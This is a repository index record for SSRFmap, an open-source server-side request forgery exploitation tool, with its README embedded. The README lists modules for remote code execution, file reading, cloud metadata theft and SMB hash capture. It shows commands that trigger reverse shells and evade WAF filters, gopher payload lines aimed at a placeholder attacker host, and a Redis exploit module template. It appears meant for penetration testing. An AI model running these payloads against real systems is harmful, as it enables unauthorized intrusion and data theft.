{"id":13538892,"url":"https://github.com/swisskyrepo/ssrfmap","last_synced_at":"2025-04-23T21:03:21.651Z","repository":{"id":41458022,"uuid":"153167583","full_name":"swisskyrepo/SSRFmap","owner":"swisskyrepo","description":"Automatic SSRF fuzzer and exploitation tool","archived":false,"fork":false,"pushed_at":"2025-02-26T19:39:06.000Z","size":4484,"stargazers_count":3169,"open_issues_count":6,"forks_count":538,"subscribers_count":57,"default_branch":"master","last_synced_at":"2025-04-23T21:03:12.303Z","etag":null,"topics":["ctf","exploitation","hacktoberfest","pentest","server-side-request-forgery","ssrf","ssrfmap","vulnerability"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/swisskyrepo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"swisskyrepo","ko_fi":"swissky","custom":"https://www.buymeacoffee.com/swissky"}},"created_at":"2018-10-15T19:08:26.000Z","updated_at":"2025-04-23T11:13:11.000Z","dependencies_parsed_at":"2022-08-10T02:27:15.312Z","dependency_job_id":"c34f9688-f5ba-4f5f-bd8b-5c8f2bf650b3","html_url":"https://github.com/swisskyrepo/SSRFmap","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/swisskyrepo%2FSSRFmap","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/swisskyrepo%2FSSRFmap/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/swisskyrepo%2FSSRFmap/releases"
,"manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/swisskyrepo%2FSSRFmap/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/swisskyrepo","download_url":"https://codeload.github.com/swisskyrepo/SSRFmap/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250514781,"owners_count":21443209,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ctf","exploitation","hacktoberfest","pentest","server-side-request-forgery","ssrf","ssrfmap","vulnerability"],"created_at":"2024-08-01T09:01:17.404Z","updated_at":"2025-04-23T21:03:21.632Z","avatar_url":"https://github.com/swisskyrepo.png","language":"Python","funding_links":["https://github.com/sponsors/swisskyrepo","https://ko-fi.com/swissky","https://www.buymeacoffee.com/swissky"],"categories":["\u003ca id=\"683b645c2162a1fce5f24ac2abfa1973\"\u003e\u003c/a\u003e漏洞\u0026\u0026漏洞管理\u0026\u0026漏洞发现/挖掘\u0026\u0026漏洞开发\u0026\u0026漏洞利用\u0026\u0026Fuzzing"],"sub_categories":["功能"],"readme":"# SSRFmap [![Python 3.4+](https://img.shields.io/badge/python-3.4+-blue.svg)](https://www.python.org/downloads/release/python-360/) [![Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/img/badges/Rawsec-inventoried-FF5050_flat.svg)](https://inventory.raw.pm/)\n\n\nSSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. 
SSRFmap takes a Burp request file as input and a parameter to fuzz.\n\n\u003e Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.\n\n## Summary\n\n* [Modules](#modules)\n* [Install and Manual](#install-and-manual)\n* [Examples](#examples)\n* [SSRFmap - Tests](#ssrfmap-tests)\n* [Contribute](#contribute)\n  * [Contributors](#thanks-to-the-contributors)\n\n\n## Modules\n\nThe following modules are already implemented and can be used with the `-m` argument.\n\n| Name           | Description                                              |\n| :------------- | :------------------------------------------------------- |\n| `axfr`         | DNS zone transfers (AXFR)                                |\n| `fastcgi`      | FastCGI RCE                                              |\n| `redis`        | Redis RCE                                                |\n| `github`       | Github Enterprise RCE \u003c 2.8.7                            |\n| `zabbix`       | Zabbix RCE                                               |\n| `mysql`        | MySQL Command execution                                  |\n| `postgres`     | Postgres Command execution                               |\n| `docker`       | Docker Infoleaks via API                                 |\n| `smtp`         | SMTP send mail                                           |\n| `portscan`     | Scan top 8000 ports for the host                         |\n| `networkscan`  | HTTP Ping sweep over the network                         |\n| `readfiles`    | Read files such as `/etc/passwd`                         |\n| `alibaba`      | Read files from the provider (e.g: meta-data, user-data) |\n| `aws`          | Read files from the provider (e.g: meta-data, user-data) |\n| `gce`          | Read files from the provider (e.g: meta-data, user-data) |\n| `digitalocean` | Read files from the provider (e.g: meta-data, user-data) |\n| `socksproxy`   | SOCKS4 Proxy   
                                          |\n| `smbhash`      | Force an SMB authentication via a UNC Path               |\n| `tomcat`       | Bruteforce attack against Tomcat Manager                 |\n| `custom`       | Send custom data to a listening service, e.g: netcat     |\n| `memcache`     | Store data inside the memcache instance                  |\n\n\n## Install and Manual\n\n* From the GitHub repository.\n  ```powershell\n  $ git clone https://github.com/swisskyrepo/SSRFmap\n  $ cd SSRFmap/\n  $ pip3 install -r requirements.txt\n  $ python3 ssrfmap.py\n\n    usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]\n                      [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]\n                      [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]\n\n    optional arguments:\n      -h, --help          show this help message and exit\n      -r REQFILE          SSRF Request file\n      -p PARAM            SSRF Parameter to target\n      -m MODULES          SSRF Modules to enable\n      -l HANDLER          Start an handler for a reverse shell\n      -v [VERBOSE]        Enable verbosity\n      --lhost LHOST       LHOST reverse shell or IP to target in the network\n      --lport LPORT       LPORT reverse shell or port to target in the network\n      --uagent USERAGENT  User Agent to use\n      --ssl [SSL]         Use HTTPS without verification\n      --proxy PROXY       Use HTTP(s) proxy (ex: http://localhost:8080)\n      --level [LEVEL]     Level of test to perform (1-5, default: 1)\n  ```\n\n* Docker\n  ```powershell\n  $ git clone https://github.com/swisskyrepo/SSRFmap\n  $ docker build --no-cache -t ssrfmap .\n  $ docker run -it ssrfmap ssrfmap.py [OPTIONS] \n  $ docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py\n  ```\n\n\n## Examples\n\nFirst you need a request with a parameter to fuzz; Burp requests work well with SSRFmap. \nThey should look like the following. 
More examples are available in the **./examples** folder.\n\n```powershell\nPOST /ssrf HTTP/1.1\nHost: 127.0.0.1:5000\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://mysimple.ssrf/\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 31\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nurl=https%3A%2F%2Fwww.google.fr\n```\n\nUse `-m` followed by the module name (separated by a `,` if you want to launch several modules).\n\n```powershell\n# Launch a portscan on localhost and read default files\npython ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan\n```\n\nIf you want to inject inside a header, a GET or a POST parameter, you only need to specify the parameter name.\n\n```powershell\npython ssrfmap.py -r examples/request6.txt -p X-Custom-Header -m readfiles --rfiles /tmp/test\n```\n\nIf you need a custom user-agent, use `--uagent`. Some targets use HTTPS; you can enable it with `--ssl`.\n\n```powershell\n# Launch a portscan against an HTTPS endpoint using a custom user-agent\npython ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent \"SSRFmapAgent\"\n```\n\nSome modules allow you to create a connect-back; for these you have to specify `LHOST` and `LPORT`. 
SSRFmap can also listen for the incoming reverse shell.\n\n```powershell\n# Triggering a reverse shell on a Redis\npython ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242\n\n# -l creates a listener for the reverse shell on the specified port\n# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload\n```\n\nWhen the target is protected by a WAF or some filters, you can try a wide range of payloads and encodings with the `--level` parameter.\n\n```powershell\n# --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -\u003e [::] -\u003e 0000: -\u003e ...\n```\n\n## SSRFmap Tests\n\nA quick way to test the framework is to run it against the `examples/example.py` SSRF service.\n\n* Local\n  ```powershell\n  FLASK_APP=examples/example.py flask run \u0026\n  python ssrfmap.py -r examples/request.txt -p url -m readfiles\n  ```\n\n* Docker\n  ```ps1\n  docker build --no-cache -t ssrfmap .\n\n  # run example ssrf http service\n  docker run -it -v \"$(pwd)\":/usr/src/app -p 5000:5000 ssrfmap examples/example.py\n\n  # run example ssrf dns service\n  docker exec -u root:root -it example python examples/ssrf_dns.py\n\n  # run ssrfmap tool\n  docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles\n  ```\n\nLaunch the test requests:\n\n```ps1\ndocker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles /etc/issue\ndocker exec -it example python ssrfmap.py -r examples/request2.txt -p url -m readfiles --rfiles /etc/issue\ndocker exec -it example python ssrfmap.py -r examples/request3.txt -p url -m readfiles --rfiles /etc/issue\ndocker exec -it example python ssrfmap.py -r examples/request4.txt -p url -m readfiles --rfiles /etc/issue\ndocker exec -it example python ssrfmap.py -r examples/request5.txt -p url -m readfiles --rfiles /etc/issue\ndocker exec -it example python ssrfmap.py -r examples/request6.txt -p 
X-Custom-Header -m readfiles --rfiles /etc/issue\ndocker exec -it example python ssrfmap.py -r examples/request.txt -p url -m axfr\ndocker exec -it example python ssrfmap.py -r examples/request3.txt -p url -m axfr --lhost 127.0.0.1 --lport 53 --ldomain example.lab\n```\n\n\n## Contribute\n\nI :heart: pull requests :)\nFeel free to add any feature listed below or a new service.\n  - Redis PHP Exploitation \n  - HTTP module (Jenkins ?)\n  ```powershell\n  gopher://\u003cproxyserver\u003e:8080/_GET http://\u003cattacker:80\u003e/x HTTP/1.1%0A%0A\n  gopher://\u003cproxyserver\u003e:8080/_POST%20http://\u003cattacker\u003e:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body\n  ```\n\nThe following code is a template if you wish to add a module interacting with a service.\n\n```python\nfrom core.utils import *\nimport logging\n\nname          = \"servicename in lowercase\"\ndescription   = \"ServiceName RCE - What does it do\"\nauthor        = \"Name or pseudo of the author\"\ndocumentation = [\"http://link_to_a_research\", \"http://another_link\"]\n\nclass exploit():\n    SERVER_HOST = \"127.0.0.1\"\n    SERVER_PORT = \"4242\"\n\n    def __init__(self, requester, args):\n        logging.info(\"Module '{}' launched !\".format(name))\n\n        # Handle args for reverse shell\n        if args.lhost == None: self.SERVER_HOST = input(\"Server Host:\")\n        else:                  self.SERVER_HOST = args.lhost\n\n        if args.lport == None: self.SERVER_PORT = input(\"Server Port:\")\n        else:                  self.SERVER_PORT = args.lport\n\n        # Data for the service\n        # Using a generator to create the host list\n        # Edit the following ip if you need to target something else\n        gen_host = gen_ip_list(\"127.0.0.1\", args.level)\n        for ip in gen_host:\n            port = \"6379\"\n            data = \"*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a\"\n            payload = wrapper_gopher(data, ip , port)\n\n            # Handle args for 
reverse shell\n            payload = payload.replace(\"SERVER_HOST\", self.SERVER_HOST)\n            payload = payload.replace(\"SERVER_PORT\", self.SERVER_PORT)\n\n            # Send the payload\n            r = requester.do_request(args.param, payload)\n```\n\nYou can also contribute with a beer IRL or via Github Sponsor button.\n\n### Thanks to the contributors\n\n\u003cp align=\"center\"\u003e\n\u003ca href=\"https://github.com/swisskyrepo/SSRFmap/graphs/contributors\"\u003e\n  \u003cimg src=\"https://contrib.rocks/image?repo=swisskyrepo/SSRFmap\u0026max=36\"\u003e\n\u003c/a\u003e\n\u003c/p\u003e\n\n\n## Inspired by\n\n- [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai](https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)\n- [Blog on Gopherus Tool  -SpyD3r](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)\n- [Gopherus - Github](https://github.com/tarunkant/Gopherus)\n- [SSRF testing - cujanovic](https://github.com/cujanovic/SSRF-Testing)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fswisskyrepo%2Fssrfmap","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fswisskyrepo%2Fssrfmap","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fswisskyrepo%2Fssrfmap/lists"}